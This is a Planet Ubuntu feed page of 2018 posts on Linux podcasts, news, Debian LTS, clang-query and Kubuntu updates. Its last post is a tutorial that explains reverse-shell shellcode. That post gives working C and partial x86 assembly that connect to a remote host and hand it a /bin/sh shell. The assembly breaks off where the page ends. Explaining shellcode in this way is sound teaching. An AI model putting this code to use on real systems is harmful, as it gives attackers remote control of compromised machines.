You are here

Planet Ubuntu

Subscribe to Feed Planet Ubuntu
Planet Ubuntu - http://planet.ubuntu.com/
Përditësimi: 6 months 4 javë më parë

Tiago Carrondo: S01E11 – Alta Coltura

Hën, 19/11/2018 - 12:32pd

Esta semana o trio maravilha dedicou a sua atenção a sugestões de leitura, técnica ou não, porque a vida não são só podcasts… As novidades no mundo SolusOS, a parceria da Canonical e da Samsung e o projecto Linux on Dex, sem esquecer a Festa do Software Livre da Moita 2018, que está já aí! Já sabes: Ouve, subscreve e partilha!

Patrocínios

Este episódio foi produzido e editado por Alexandre Carrapiço (Thunderclaws Studios – captação, produção, edição, mistura e masterização de som) contacto: thunderclawstudiosPT–arroba–gmail.com.

Atribuição e licenças

A música do genérico é: “Won’t see it comin’ (Feat Aequality & N’sorte d’autruche)”, por Alpha Hydrae e está licenciada nos termos da CC0 1.0 Universal License.

Este episódio está licenciado nos termos da licença: Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0), cujo texto integral pode ser lido aqui. Estamos abertos a licenciar para permitir outros tipos de utilização, contactem-nos para validação e autorização.

Full Circle Magazine: Full Circle Weekly News #115

Dje, 18/11/2018 - 6:01md

Open Source Software: 20-Plus Years of Innovation
Source: https://www.linuxinsider.com/story/Open-Source-Software-20-Plus-Years-of-Innovation-85646.html

IBM Buys Linux & Open Source Software Distributor Red Hat For $34 Billion
Source: https://fossbytes.com/ibm-buys-red-hat-open-source-linux/

We (may) now know the real reason for that IBM takeover. A distraction for Red Hat to axe KDE
Source: https://www.theregister.co.uk/2018/11/02/rhel_deprecates_kde/

Ubuntu Founder Mark Shuttleworth Has No Plans Of Selling Canonical
Source: https://fossbytes.com/ubuntu-founder-mark-shuttleworth-has-no-plans-of-selling-canonical/

Mark Shuttleworth reveals Ubuntu 18.04 will get a 10-year support lifespan
Source: https://www.zdnet.com/article/mark-shuttleworth-reveals-ubuntu-18-04-will-get-a-10-year-support-lifespan/

Debian GNU/Linux 9.6 “Stretch” Released with Hundreds of Updates
Source: https://news.softpedia.com/news/debian-gnu-linux-9-6-stretch-released-with-hundreds-of-updates-download-now-523739.shtml

Fresh Linux Mint 19.1 Arrives This Christmas
Source: https://www.forbes.com/sites/jasonevangelho/2018/11/01/fresh-linux-mint-19-1-arrives-this-christmas/#6c64618d293d

Linux-friendly company System76 shares more open source Thelio computer details
Source: https://betanews.com/2018/10/26/system76-open-source-thelio-linux/

Linus Torvalds Says Linux 5.0 Comes in 2019, Kicks Off Development of Linux 4.20
Source: https://news.softpedia.com/news/linus-torvalds-is-back-kicks-off-the-development-of-linux-kernel-4-20-523622.shtml

Canonical Adds Spectre V4, SpectreRSB Fixes to New Ubuntu 18.04 LTS Azure Kernel
Source: https://news.softpedia.com/news/canonical-adds-spectre-v4-spectrersb-fixes-to-new-ubuntu-18-04-lts-azure-kernel-523533.shtml

Trivial Bug in X.Org Gives Root Permission on Linux and BSD Systems
Source: https://www.bleepingcomputer.com/news/security/trivial-bug-in-xorg-gives-root-permission-on-linux-and-bsd-systems/

Security Researcher Drops VirtualBox Guest-to-Host Escape Zero-Day on GitHub
Source: https://news.softpedia.com/news/security-researcher-drops-virtualbox-guest-to-host-escape-zero-day-on-github-523660.shtml

Robert Ancell: Counting Code in GNOME Settings

Enj, 15/11/2018 - 9:05md
I've been spending a bit of time recently working on GNOME Settings. One part of this has been bringing some of the older panel code up to modern standards, one of which is making use of GtkBuilder templates.
I wondered if any of these changes would show in the stats, so I wrote a program to analyse each branch in the git repository and break down the code between C and GtkBuilder. The results were graphed in Google Sheets:



This is just the user accounts panel, which shows some of the reduction in C code and increase in GtkBuilder data:


Here's the breakdown of which panels make up the codebase:



I don't think this draws any major conclusions, but is still interesting to see. Of note:
  • Some of the changes make in 3.28 did reduce the total amount of code! But it was quickly gobbled up by the new Thunderbolt panel.
  • Network and Printers are the dominant panels - look at all that code!
  • I ignored empty lines in the files in case differing coding styles would make some panels look bigger or smaller. It didn't seem to make a significant difference.
  • You can see a reduction in C code looking at individual panels that have been updated, but overall it gets lost in the total amount of code.
I'll have another look in a few cycles when more changes have landed (I'm working on a new sound panel at the moment).

Ubuntu Podcast from the UK LoCo: S11E36 – Thirty-Six Hours

Enj, 15/11/2018 - 4:00md

This week we’ve been resizing partitions. We interview Andrew Katz and discuss open souce and the law, bring you a command line love and go over all your feedback.

It’s Season 11 Episode 36 of the Ubuntu Podcast! Alan Pope, Mark Johnson and Martin Wimpress are connected and speaking to your brain.

In this week’s show:

snap install hub hub ci-status hub issue hub pr hub sync hub pull-request
  • And we go over all your amazing feedback – thanks for sending it – please keep sending it!

  • Image credit: Greyson Joralemon

That’s all for this week! You can listen to the Ubuntu Podcast back catalogue on YouTube. If there’s a topic you’d like us to discuss, or you have any feedback on previous shows, please send your comments and suggestions to show@ubuntupodcast.org or Tweet us or Comment on our Facebook page or comment on our Google+ page or comment on our sub-Reddit.

Raphaël Hertzog: Freexian’s report about Debian Long Term Support, October 2018

Enj, 15/11/2018 - 3:36md

Like each month, here comes a report about the work of paid contributors to Debian LTS.

Individual reports

In October, about 209 work hours have been dispatched among 13 paid contributors. Their reports are available:

  • Abhijith PA did 1 hour (out of 10 hours allocated + 4 extra hours, thus keeping 13 extra hours for November).
  • Antoine Beaupré did 24 hours (out of 24 hours allocated).
  • Ben Hutchings did 19 hours (out of 15 hours allocated + 4 extra hours).
  • Chris Lamb did 18 hours (out of 18 hours allocated).
  • Emilio Pozuelo Monfort did 12 hours (out of 30 hours allocated + 29.25 extra hours, thus keeping 47.25 extra hours for November).
  • Holger Levsen did 1 hour (out of 8 hours allocated + 19.5 extra hours, but he gave back the remaining hours due to his new role, see below).
  • Hugo Lefeuvre did 10 hours (out of 10 hours allocated).
  • Markus Koschany did 30 hours (out of 30 hours allocated).
  • Mike Gabriel did 4 hours (out of 8 hours allocated, thus keeping 4 extra hours for November).
  • Ola Lundqvist did 4 hours (out of 8 hours allocated + 8 extra hours, but gave back 4 hours, thus keeping 8 extra hours for November).
  • Roberto C. Sanchez did 15.5 hours (out of 18 hours allocated, thus keeping 2.5 extra hours for November).
  • Santiago Ruano Rincón did 10 hours (out of 28 extra hours, thus keeping 18 extra hours for November).
  • Thorsten Alteholz did 30 hours (out of 30 hours allocated).
Evolution of the situation

In November we are welcoming Brian May and Lucas Kanashiro back as contributors after they took some break from this work.

Holger Levsen is stepping down as LTS contributor but is taking over the role of LTS coordinator that was solely under the responsibility of Raphaël Hertzog up to now. Raphaël continues to handle the administrative side, but Holger will coordinate the LTS contributors ensuring that the work is done and that it is well done.

The number of sponsored hours increased to 212 hours per month, we gained a new sponsor (that shall not be named since they don’t want to be publicly listed).

The security tracker currently lists 27 packages with a known CVE and the dla-needed.txt file has 27 packages needing an update.

Thanks to our sponsors

New sponsors are in bold.

No comment | Liked this article? Click here. | My blog is Flattr-enabled.

Tiago Carrondo: S01E10 – Tendência livre

Mër, 14/11/2018 - 3:02pd

Desta vez com um convidado, o Luís Costa, falámos muito sobre hardware, hardware livre e como não poderia deixar de ser: dos novos produtos da Libretrend, as novíssimas Librebox. Em mês de eventos a agenda teve um especial destaque com as actualizações disponíveis de todos os encontros e eventos anunciados! Já sabes: Ouve, subscreve e partilha!

Patrocínios

Este episódio foi produzido e editado por Alexandre Carrapiço (Thunderclaws Studios – captação, produção, edição, mistura e masterização de som) contacto: thunderclawstudiosPT–arroba–gmail.com.

Atribuição e licenças

A imagem de capa: richard ling em Visualhunt e está licenciada como CC BY-NC-ND.

A música do genérico é: “Won’t see it comin’ (Feat Aequality & N’sorte d’autruche)”, por Alpha Hydrae e está licenciada nos termos da CC0 1.0 Universal License.

Este episódio está licenciado nos termos da licença: Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0), cujo texto integral pode ser lido aqui. Estamos abertos a licenciar para permitir outros tipos de utilização, contactem-nos para validação e autorização.

Stephen Kelly: Future Developments in clang-query

Dje, 11/11/2018 - 11:46md
Getting started – clang-tidy AST Matchers

Over the last few weeks I published some blogs on the Visual C++ blog about Clang AST Matchers. The series can be found here:

I am not aware of any similar series existing which covers creation of clang-tidy checks, and use of clang-query to inspect the Clang AST and assist in the construction of AST Matcher expressions. I hope the series is useful to anyone attempting to write clang-tidy checks. Several people have reported to me that they have previously tried and failed to create clang-tidy extensions, due to various issues, including lack of information tying it all together.

Other issues with clang-tidy include the fact that it relies on the “mental model” a compiler has of C++ source code, which might differ from the “mental model” of regular C++ developers. The compiler needs to have a very exact representation of the code, and needs to have a consistent design for the class hierarchy representing each standard-required feature. This leads to many classes and class hierarchies, and a difficulty in discovering what is relevant to a particular problem to be solved.

I noted several problems in those blog posts, namely:

  • clang-query does not show AST dumps and diagnostics at the same time<
  • Code completion does not work with clang-query on Windows
  • AST Matchers which are appropriate to use in contexts are difficult to discover
  • There is no tooling available to assist in discovery of source locations of AST nodes

Last week at code::dive in Wroclaw, I demonstrated tooling solutions to all of these problems. I look forward to video of that talk (and videos from the rest of the conference!) becoming available.

Meanwhile, I’ll publish some blog posts here showing the same new features in clang-query and clang-tidy.

clang-query in Compiler Explorer

Recent work by the Compiler Explorer maintainers adds the possibility to use source code tooling with the website. The compiler explorer contains new entries in a menu to enable a clang-tidy pane.

clang-tidy in Compiler Explorer

I demonstrated use of compiler explorer to use the clang-query tool at the code::dive conference, building upon the recent work by the compiler explorer developers. This feature will get upstream in time, but can be used with my own AWS instance for now. This is suitable for exploration of the effect that changing source code has on match results, and orthogonally, the effect that changing the AST Matcher has on the match results. It is also accessible via cqe.steveire.com.

It is important to remember that Compiler Explorer is running clang-query in script mode, so it can process multiple let and match calls for example. The new command set print-matcher true helps distinguish the output from the matcher which causes the output. The help command is also available with listing of the new features.

The issue of clang-query not printing both diagnostic information and AST information at the same time means that users of the tool need to alternate between writing

set output diag

and

set output dump

to access the different content. Recently, I committed a change to make it possible to enable both output and diag output from clang-query at the same time. New commands follow the same structure as the set output command:

enable output dump disable output dump

The set output <feature> command remains as an “exclusive” setting to enable only one output feature and disable all others.

Dumping possible AST Matchers

This command design also enables the possibility of extending the features which clang-query can output. Up to now, developers of clang-tidy extensions had to inspect the AST corresponding to their source code using clang-query and then use that understanding of the AST to create an AST Matcher expression.

That mapping to and from the AST “mental model” is not necessary. New features I am in the process of upstreaming to clang-query enable the output of AST Matchers which may be used with existing bound AST nodes. The command

enable output matcher

causes clang-query to print out all matcher expressions which can be combined with the bound node. This cuts out the requirement to dump the AST in such cases.

Inspecting the AST is still useful as a technique to discover possible AST Matchers and how they correspond to source code. For example if the functionDecl() matcher is already known and understood, it can be dumped to see that function calls are represented by the CallExpr in the Clang AST. Using the callExpr() AST Matcher and dumping possible matchers to use with it leads to the discovery that callee(functionDecl()) can be used to determine particulars of the function being called. Such discoveries are not possible by only reading AST output of clang-query.

Dumping possible Source Locations

The other important discovery space in creation of clang-tidy extensions is that of Source Locations and Source Ranges. Developers creating extensions must currently rely on the documentation of the Clang AST to discover available source locations which might be relevant. Usually though, developers have the opposite problem. They have source code, and they want to know how to access a source location from the AST node which corresponds semantically to that line and column in the source.

It is important to make use a semantically relevant source location in order to make reliable tools which refactor at scale and without human intervention. For example, a cursory inspection of the locations available from a FunctionDecl AST node might lead to the belief that the return type is available at the getBeginLoc() of the node.

However, this is immediately challenged by the C++11 trailing return type feature, where the actual return type is located at the end. For a semanticallly correct location, you must currently use

getTypeSourceInfo()->getTypeLoc().getAs().getReturnLoc().getBeginLoc()

It should be possible to use getReturnTypeSourceRange(), but a bug in clang prevents that as it does not appreciate the trailing return types feature.

Once again, my new output feature of clang-query presents a solution to this discovery problem. The command

enable output srcloc

causes clang-query to output the source locations by accessor and caret corresponding to the source code for each of the bound nodes. By inspecting that output, developers of clang-tidy extensions can discover the correct expression (usually via the clang::TypeLoc heirarchy) corresponding to the source code location they are interested in refactoring.

Next Steps

I have made many more modifications to clang-query which I am in the process of upstreaming. My Compiler explorer instance is listed as the ‘clang-query-future’ tool, while the clang-query-trunk tool runs the current trunk version of clang-query. Both can be enabled for side-by-side comparison of the future clang-query with the exising one.

Kubuntu General News: Plasma 5.14.3 update for Cosmic backports PPA

Mër, 07/11/2018 - 1:44md

We are pleased to announce that the 3rd bugfix release of Plasma 5.14, 5.14.3, is now available in our backports PPA for Cosmic 18.10.

The full changelog for 5.14.3 can be found here.

Already released in the PPA is an update to KDE Frameworks 5.51.

To upgrade:

Add the following repository to your software sources list:

ppa:kubuntu-ppa/backports

or if it is already added, the updates should become available via your preferred update method.

The PPA can be added manually in the Konsole terminal with the command:

sudo add-apt-repository ppa:kubuntu-ppa/backports

and packages then updated with

sudo apt update
sudo apt full-upgrade

 

IMPORTANT

Please note that more bugfix releases are scheduled by KDE for Plasma 5.14, so while we feel these backports will be beneficial to enthusiastic adopters, users wanting to use a Plasma release with more stabilisation/bugfixes ‘baked in’ may find it advisable to stay with Plasma 5.13.5 as included in the original 18.10 Cosmic release.

Should any issues occur, please provide feedback on our mailing list [1], IRC [2], and/or file a bug against our PPA packages [3].

1. Kubuntu-devel mailing list: https://lists.ubuntu.com/mailman/listinfo/kubuntu-devel
2. Kubuntu IRC channels: #kubuntu & #kubuntu-devel on irc.freenode.net
3. Kubuntu ppa bugs: https://bugs.launchpad.net/kubuntu-ppa

Diego Turcios: Access to AWS Postgres instance in private subnet

Mër, 07/11/2018 - 3:54pd
I have been working with AWS in the last days and encounter some issues when using RDS.  Generally when you're working in development environment you have setup your database as Publicly accessible and this isn't an issue. But when you're working in Production. So we place the Amazon RDS database into a private subnet. What we need to do for connecting to the database using PgAdmin or other tool?

We're going to use one of the most common methods for doing this. You will need to launch an Amazon EC2 instance in the public subnet and then use it as jumping box.

So after you have your EC2, you will need to run the following command.
See explantion below

After this, you will need to configure your PgAdmin.
The host name will be your localhost, the port is the same you define in the above command.
Maintenance database will be your DB name and the username you have for connecting.

Hope this helps you connect to your databases.

Jono Bacon: Video: 10 Avoidable Career Mistakes (and How to Conquer Them)

Mar, 06/11/2018 - 5:30md

I don’t claim to be a career expert, but I have noticed some important career mistakes many people make (some I’ve made myself!). These mistakes span how we approach our career growth, balance our careers with the rest of our lives, and the make the choices we do on a day to day basis.

In the latest episode of my Open Organization video series, I delve into 10 of the most important career mistakes people tend to make. Check it below:

So, now let me turn it to you. What are other career mistakes that are avoidable? What have you learned in your career? Share them in the comments below!

The post Video: 10 Avoidable Career Mistakes (and How to Conquer Them) appeared first on Jono Bacon.

Jono Bacon: My Clients Are Hiring Community Roles: Corelight, Scality, and Solace

Hën, 05/11/2018 - 7:29pd

One of the things I love about working with such a diverse range of clients is helping them to shape, source, and mentor high-quality staff to build and grow their communities.

Well, three of clients Corelight, Scality, and Solace are all hiring community staff for their teams. I know many of you work in community management, so I always want to share new positions here in case you want to apply. If these look interesting, you should apply via the role description – don’t send me your resume. If we know each other (as in, we are friends/associates), feel free to reach out to me if you have questions.

(These are listed alphabetically based on the company name)

Corelight Director of Community

See the role here

Corelight are doing some really interesting work. They provide security solutions based around the Bro security monitor, and they invest heavily in that community (hiring staff, sponsoring events, producing code and more). Corelight are very focused on open source and being good participants in the Bro community. This role will not just serve Corelight but also support and grow the Bro community.

Scality Technical Community Manager

See the role here

I started working with Scality a while back with the focus of growing their open source Zenko community. As I started shaping the community strategy with them, we hired for the Director Of Community role there, and my friend Stefano Maffulli got it, who had done great work at Dreamhost and OpenStack.

Well, Stef needs to hire someone for his team, and this is a role with a huge amount of potential. It will be focused on building, fostering, and growing the Zenko community, producing technical materials, working with developers, speaking, and more. Stef is a great guy and will be a great manager to work for.

Solace Director Of Community and Developer Community Evangelist

Solace have built a lightning-fast infrastructure messaging platform and they are building a community focused on supporting developers who use their platform. They are a great team, and are really passionate about not just building a community, but doing it the right way.

They are hiring for two roles. One will be leading the overall community strategy and delivery and the other will be an evangelist role focused on building awareness and developer engagement.

All three of these companies are doing great work, and really focused on building community the right way. Check out the roles and best of luck!

The post My Clients Are Hiring Community Roles: Corelight, Scality, and Solace appeared first on Jono Bacon.

Stephen Michael Kellat: Writing Up Plan B

Hën, 05/11/2018 - 12:21pd

With the prominence of things like Liberapay and Patreon as well as Snowdrift.coop, I have had to look at the tax implications of them all.  There is no single tax regime on this planet.  Developers and other freelancers who might make use of one of these services within the F/LOSS frame of reference are frequently not within the USA frame of reference.  That makes a difference.

 

I also have to state at the outset that this does not constitute legal advice.  I am not a lawyer.  I am most certainly not your lawyer.  If anything these recitals are my setting out my review of all this as being “Plan B” due to continuing high tensions surrounding being a federal civil servant in the United States.  With an election coming up Tuesday where one side treats it as a normal routine event while the other is regarding it as Ragnarok and is acting like humanity is about to face an imminent extinction event, changing things up in life may be worthwhile.

 

An instructive item to consider is Internal Revenue Service Publication 334 Tax Guide for Small Business (For Individuals Who Use Schedule C or C-EZ).  The current version can be found online at https://www.irs.gov/forms-pubs/about-publication-334.  Just because you receive money from people over the Internet does not necessarily mean it is free from taxation.  Generally the income a developer, freelance documentation writer, or a freelancer in general might receive from a Liberapay or Snowdrift.coop appears to fall under “gross receipts”.  

 

A recent opinion of the United States Tax Court (Felton v. Commissioner, T.C. Memo 2018-168) discusses the issue of “gift” for tax purposes rather nicely in comparison to what Liberapay mentions in its FAQ.  You can find the FAQ at https://liberapay.com/about/faq.  The opinion can be found at https://www.ustaxcourt.gov/ustcinop/OpinionViewer.aspx?ID=11789.  After reading the discussion in Felton, I remain assured that in the United States context anything received via Liberapay would have to be treated as gross receipts in the United States.  The rules are different in the European Union where Liberapay is based and that’s perfectly fine.  In the end I have to answer to the tax authorities in the United States.

 

The good part about reporting matters on Schedule C is that it preserves participation in Social Security and allows a variety of business expenses and deductions to be taken.  Regular wage-based employees pay into Social Security via the FICA tax.  Self-employed persons pay into Social Security via SECA tax.

 

Now, there are various works I would definitely ask for support if I left government.  Such includes:

 

  • Freelance documentation writing

  • Emergency Management/Homeland Security work under the aegis of my church

  • Podcast production

  • Printing & Publishing

 

For podcast production, general news reviews would be possible.  Going into actual entertainment programming would be nice.  There are ideas I’m still working out.

 

Printing & Publishing would involve getting small works into print on a more rapid cycle in light of an increasingly censored Internet.  As the case of Gab.ai shows, you can have one of your users do something horrible but not actually do anything as a site but still have all your hosting partners withdraw service so as to knock you offline.  Outside the context of the USA, total shutdowns of access to the Internet still occur from time to time in other countries.

 

Emergency Management comes under the helping works of the church.

 

As to documentation writing, I used to write documentation for Xubuntu.  I want to do that again.

 

As to the proliferation of codes of conduct that are appearing everywhere, I can only offer the following statement:

 

“I am generally required to obey the United States Constitution and laws of the United States of America, the Constitution of the State of Ohio and Ohio’s laws, and the orders of any commanding officers appointed to me as a member of the unorganized militia (Ohio Revised Code 5923.01(D), Title 10 United States Code Section 246(b)(2)).  Codes of Conduct adopted by projects and organizations that conflict with those legal responsibilities must either be disregarded or accommodations must otherwise be sought.”

 

So, that’s “Plan B”.  The dollar amounts remain flexible at the moment as I’m still waiting for matters to pan out at work.  If things turn sour at my job, I at least have plans to hit the ground running seeking contracts and otherwise staying afloat.

 

 

Santiago Zarate: gentoo eix-update failure

Dje, 04/11/2018 - 1:00pd
Summary

If you are having the following error on your Gentoo system:

Can't open the database file '/var/cache/eix/portage.eix' for writing (mode = 'wb')

Don’t waste your time, simply the /var/cache/eix directory is not present and/or writeable by the eix/portage use

mkdir -p /var/cache/eix chmod +w /var/cache/eix*

Basic story is that eix will drop privileges to portage user when ran as root.

Jonathan Riddell: Red Hat and KDE

Pre, 02/11/2018 - 5:36md

By a strange coincidence the news broke this morning that RHEL is deprecating KDE. The real surprise here is that RHEL supported KDE all.  Back in the 90s they were entirely against KDE and put lots of effort into our friendly rivals Gnome.  It made some sense since at the time Qt was under a not-quite-free licence and there’s no reason why a company would want to support another company’s lock in as well as shipping incompatible licences.  By the time Qt become fully free they were firmly behind Gnome.  Meanwhile Rex and a team of hard working volunteers packaged it anyway and gained many users.  When Red Hat was turned into the all open Fedora and the closed RHEL, Fedora was able to embrace KDE as it should but at some point the Fedora Next initiative again put KDE software in second place. Meanwhile RHEL did use Plasma 4 and hired a number of developers to help us in our time of need which was fabulous but all except one have left some time ago and nobody expected it to continue for long.

So the deprecation is not really new or news and being picked up by the news is poor timing for Red Hat, it’s unclear if they want some distraction from the IBM news or just The Register playing around.  The community has always been much better at supporting out software for their users, maybe now the community run EPEL archive can include modern Plasma 5 instead of being stuck on the much poorer previous release.

Plasma 5 is now lightweight and feature full.  We get new users and people rediscovering us every day who report it as the most usable and pleasant way to run their day.  From my recent trip in Barcelona I can see how a range of different users from university to schools to government consider Plasma 5 the best way to support a large user base.  We now ship on high end devices such as the KDE Slimbook down to the low spec value device of Pinebook.  Our software leads the field in many areas such as video editor Kdenlive, or painting app Krita or educational suite GCompris.  Our range of projects is wider than ever before with textbook project WikiToLearn allowing new ways to learn and we ship our own software through KDE Windows, Flatpak builds and KDE neon with Debs, Snaps and Docker images.

It is a pity that RHEL users won’t be there to enjoy it by default. But, then again, they never really were. KDE is collaborative, open, privacy aware and with a vast scope of interesting projects after 22 years we continue to push the boundaries of what is possible and fun.

by

Diego Turcios: Getting Docker Syntax In Gedit

Pre, 02/11/2018 - 5:18md
I have been working with docker in the last days, and encounter the syntax issue with gedit. Just pure plain text. So make a small search and found an easy way for fixing this. I found Jasper J.F. van den Bosch repository in GitHub and found the solution for this simple problem.
We need to download the docker.lang file, available here: https://github.com/ilogue/docker.lang/blob/master/docker.lang

After that, you go to the folder you save the file and do the following command.
sudo mv docker.lang /usr/share/gtksourceview-3.0/language-specs/ If this doesn't work you can try the following:

sudo mv docker.lang  ~/.local/share/gtksourceview-3.0/language-specs/And that's all!

Screenshot of gedit with no docker lang


Screenshot of gedit with docker lang

Sean Davis: Xubuntu Development Update November 2018

Enj, 01/11/2018 - 4:28pd

Aaaaaaaaaaaand, we’re back! After skipping last month’s development update, there’s a lot of new developments to unpack for the previous 2 months. Let’s get right to it.

Xubuntu 18.10 “Cosmic Cuttlefish”

We wrapped up development on Xubuntu 18.10 throughout September and October, landing the following changes in the last month and a half of work.

This release includes 6 new GTK+ 3 Xfce components, giving users a snapshot of the Xfce 4.14 development. More information about the release can be found in the release notes.

Upcoming Fixes

Since the 18.10 release, we’ve identified fixes for two of our documented bugs. We’ll be pushing these fixes to our users via the stable release updates.

  • Panel: Window buttons are not clickable at the top pixel of the screen (LP: #1795135)
    • Resolution: Export GDK_CORE_DEVICE_EVENTS = 1 (Xfce Git)
  • Settings Manager: Mouse fails to scroll embedded panels (LP: #1653448)
    • Resolution: Export GDK_CORE_DEVICE_EVENTS = 1 (Xfce Git)
Xfce September New Releases October New Releases 4.14 Roadmap Updates

The Xfce development team has worked on tidying up the Xfce 4.14 roadmap over the last few days. Statuses have been updated, pending work has been moved to the top of each section, and completion percents have been adjusted to better reflect each project’s progress. With these updates, we can now see that…

Xfce 4.14 is now approximately 83% complete.

Of course, we need all the help we can get to get this milestone out the door. Check out the Xfce Contribute page to find out how you can help.

What’s Next?

With the 18.10 release now behind us, and the 19.04 cycle starting today, it’s time to get back to work! No release goals have been determined yet, so stay tuned to the Xubuntu Development mailing list for updates about Xubuntu 19.04 “Disco Dingo” development.

Daniel Pocock: RHL'19 St-Cergue, Switzerland, 25-27 January 2019

Mër, 31/10/2018 - 10:06md

(translated from original French version)

The Rencontres Hivernales du Libre (RHL) (Winter Meeting of Freedom) takes place 25-27 January 2019 at St-Cergue.

Swisslinux.org invites the free software community to come and share workshops, great meals and good times.

This year, we celebrate the 5th edition with the theme «Exploit».

Please think creatively and submit proposals exploring this theme: lectures, workshops, performances and other activities are all welcome.

RHL'19 is situated directly at the base of some family-friendly ski pistes suitable for beginners and more adventurous skiers. It is also a great location for alpine walking trails.

Why, who?

RHL'19 brings together the forces of freedom in the Leman basin, Romandy, neighbouring France and further afield (there is an excellent train connection from Geneva airport). Hackers and activists come together to share a relaxing weekend and discover new things with free technology and software.

If you have a project to present (in 5 minutes, an hour or another format) or activities to share with other geeks, please send an email to rhl-team@lists.swisslinux.org or submit it through the form.

If you have any specific venue requirements please contact the team.

You can find detailed information on the event web site.

Please ask if you need help finding accommodation or any other advice planning your trip to the region.

Lubuntu Blog: Disco Dingo: The development cycle has started!

Mër, 31/10/2018 - 4:16md
The development cycle for the Disco Dingo (which will be the codename for the 19.04 release) has started for the Lubuntu team! Translated into: español UPDATE: Daily images are now up, and are available on our downloads page, for the adventurous. Also, an update to Perl 5.28 is being done prior to opening as well. […]

David Tomaschik: Understanding Shellcode: The Reverse Shell

Mar, 30/10/2018 - 8:00pd

A recent conversation with a coworker inspired me to start putting together a series of blog posts to examine what it is that shellcode does. In the first installment, I’ll dissect the basic reverse shell.

First, a couple of reminders: shellcode is the machine code that is injected into the flow of a program as the result of an exploit. It generally must be position independent as you can’t usually control where it will be loaded in memory. A reverse shell initiates a TCP connection from the compromised host back to a host under the control of the attacker. It then launches a shell with which the attacker can interact.

Reverse Shell in C

Let’s examine a basic reverse shell in C. Error handling is elided, both for the space in this post, and because most shellcode is not going to have error handling.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <unistd.h> void reverse_shell() { /* Allocate a socket for IPv4/TCP (1) */ int sock = socket(AF_INET, SOCK_STREAM, 0); /* Setup the connection structure. (2) */ struct sockaddr_in sin; sin.sin_family = AF_INET; sin.sin_port = htons(4444); /* Parse the IP address (3) */ inet_pton(AF_INET, "192.168.22.33", &sin.sin_addr.s_addr); /* Connect to the remote host (4) */ connect(sock, (struct sockaddr *)&sin, sizeof(struct sockaddr_in)); /* Duplicate the socket to STDIO (5) */ dup2(sock, STDIN_FILENO); dup2(sock, STDOUT_FILENO); dup2(sock, STDERR_FILENO); /* Setup and execute a shell. (6) */ char *argv[] = {"/bin/sh", NULL}; execve("/bin/sh", argv, NULL); } Reverse Shell Steps

As can be seen, there are approximately 6 steps in setting up a reverse shell. Once they are understood, this can be converted to proper shellcode.

  1. First we need to allocate a socket structure in the kernel with a call to socket. This is a wrapper for a system call (since it has effects in kernel space). On x86, this wraps a system call called socketcall, which is a single entry point for dispatching all socket-related system calls. On x86-64, the different socket system calls are actually distinct system calls, so this will call the socket system call. It needs to know the address family (AF_INET for IPv4) and the socket type (SOCK_STREAM for TCP, it would be SOCK_DGRAM for UDP). This returns an integer that is a file descriptor for the socket.
  2. Next, we need to setup a struct sockaddr_in, which includes the family (AF_INET again), and the port number in network byte order (big-endian).
  3. We also need to put the IP address into the structure. inet_pton can parse a string form into the struct. In a struct sockaddr_in, this is a 4 byte value, again in network byte order.
  4. We now have the full structure setup, so we can initiate a connection to the remote host using the already-created socket. This is done with a call to connect. Like socket, this is a wrapper for the socketcall system call on x86, and for a connect system call on x86-64.
  5. We want the shell to use our socket when it is handling standard input/output (stdio) functions. To do this, we duplicate the file descriptor from the socket to each of STDIN, STDOUT, STDERR. Like so many, dup2() is a thin wrapper around a system call.
  6. Finally, we setup the arguments for our shell, and launch it with execve, yet another system call. This one will replace the current binary image with the targeted binary (/bin/sh) and then execute it from the entry point. It will execute with its standard input, output, and error connected to the network socket.
Why not shellcode in C?

So, if we have a working function, why can’t we just use that as shellcode? Well, even if we compile position independent code (-pie -fPIE in gcc), this code will still have many library calls in it. In a normal program, this is no problem, as it will be linked with the C library and run fine. However, this relies on the loader doing the right thing, including the placement of the PLT and GOT. When we inject shellcode, we only inject the machine code, and don’t include any data areas necessary for the location of the GOT.

What about statically linking the C library to avoid all these problems? While that has the potential to work, any constants (like the strings for the IP address and the shell path) will be located in a different section of the binary, and so the code will be unable to reference those. (Unless we inject that section as well and fixup the relative addresses, but in that case, the complexity of our loader approaches the complexity of our entire shellcode.)

Reverse Shell in x86

My shellcode below will be written with the intent of being as clear as possible as a learning instrument. Consequently, it is neither the shortest possible shellcode, nor is it free of “bad characters” (null bytes, newlines, etc.). It is also written as NASM assembly.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 ; Do the steps to setup a socket (1) ; SYS_socket = 1 mov ebx, 1 ; Setup the arguments to socket() on the stack. push 0 ; Flags = 0 push 1 ; SOCK_STREAM = 1 push 2 ; AF_INET = 2 ; Move a pointer to these values to ecx for socketcall. mov ecx, esp ; We're calling SYS_SOCKETCALL mov eax, 0x66 ; Get the socket int 0x80 ; Time to setup the struct sockaddr_in (2), (3) ; push the address so it ends up in network byte order ; 192.168.22.33 == 0xC0A81621 push 0x2116a8c0 ; push the port as a short in network-byte order ; 4444 = 0x115c mov ebx, 0x5c11 push bx ; push the address family, AF_INET = 2 mov ebx, 0x2 push bx ; Let's establish the connection (4) ; Save address of our struct mov ebx, esp ; Push size of the struct push 0x10 ; Push address of the struct push ebx ; Push the socketfd push eax ; Put the pointer into ecx mov ecx, esp ; We're calling SYS_CONNECT = 3 (via SYS_SOCKETCALL) mov ebx, 0x3 ; Preserve sockfd push eax ; Call SYS_SOCKETCALL mov eax, 0x66 ; Make the connection int 0x80 ; Let's duplicate the FDs from our socket. (5) ; Load the sockfd pop ebx ; STDERR mov ecx, 2 ; Calling SYS_DUP2 = 0x3f mov eax, 0x3f ; Syscall! int 0x80 ; mov to STDOUT dec ecx ; Reload eax mov eax, 0x3f ; Syscall! int 0x80 ; mov to STDIN dec ecx ; Reload eax mov eax, 0x3f ; Syscall! int 0x80 ; Now time to execve (6) ; push "/bin/sh\0" on the stack push 0x68732f push 0x6e69622f ; preserve filename mov ebx, esp ; array of arguments 